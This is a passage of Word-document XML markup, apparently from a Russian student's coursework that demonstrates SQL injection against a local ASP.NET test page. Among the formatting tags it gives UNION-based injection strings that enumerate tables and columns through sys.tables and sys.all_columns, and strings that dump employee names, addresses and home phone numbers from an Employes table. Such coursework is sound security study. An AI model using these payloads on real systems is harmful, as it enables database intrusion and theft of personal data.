+        </w:rPr>
+        <w:t>object_id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> as id from </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sys.tables</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>) as viewing where id=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sys.all_columns.object_id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">1' and '1' = '2' union select 1, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>nametable</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, name, 1 from </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sys.all_columns</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, (select name as </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>nametable</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>object_id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> as id from </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sys.tables</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>) as viewing where id=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sys.all_columns.object_id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="2843420" cy="2649190"/>
+            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
+            <wp:docPr id="9" name="Рисунок 9" descr="C:\Users\Сергей\Desktop\Скрины для курсововй\localhost25244Default.aspx - Google Chrome.jpg"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 9" descr="C:\Users\Сергей\Desktop\Скрины для курсововй\localhost25244Default.aspx - Google Chrome.jpg"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13" cstate="print"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2844668" cy="2650353"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:noFill/>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="a"/>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:snapToGrid w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:w w:val="0"/>
+          <w:sz w:val="0"/>
+          <w:szCs w:val="0"/>
+          <w:u w:color="000000"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="000000"/>
+          <w:shd w:val="clear" w:color="000000" w:fill="000000"/>
+          <w:lang/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="3081959" cy="2831530"/>
+            <wp:effectExtent l="19050" t="0" r="4141" b="0"/>
+            <wp:docPr id="10" name="Рисунок 10" descr="C:\Users\Сергей\Desktop\Скрины для курсововй\localhost25244Default.aspx - Google Chrome.jpg"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 10" descr="C:\Users\Сергей\Desktop\Скрины для курсововй\localhost25244Default.aspx - Google Chrome.jpg"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14" cstate="print"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3085731" cy="2834996"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:noFill/>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Далее, основываясь на таблице </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Employes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> мы </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>може</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> вывести все данные из этой таблицы. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Для</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>примера</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>можно</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>воспользоваться</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>следухим</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>запросом</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="29"/>
+        </w:numPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">1' and '1' = '2' union select 1, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>FirstName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> + '  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> + </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>LastName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> + '  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> + Address + '  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> + Cast(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>varchar</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(50),</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>HomePhone</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">)' , ' </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, 1 from </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Employes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="29"/>
+        </w:numPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">%') and '1' = '2' union select 1, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>FirstName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> + '  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> + </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>LastName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> + '  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
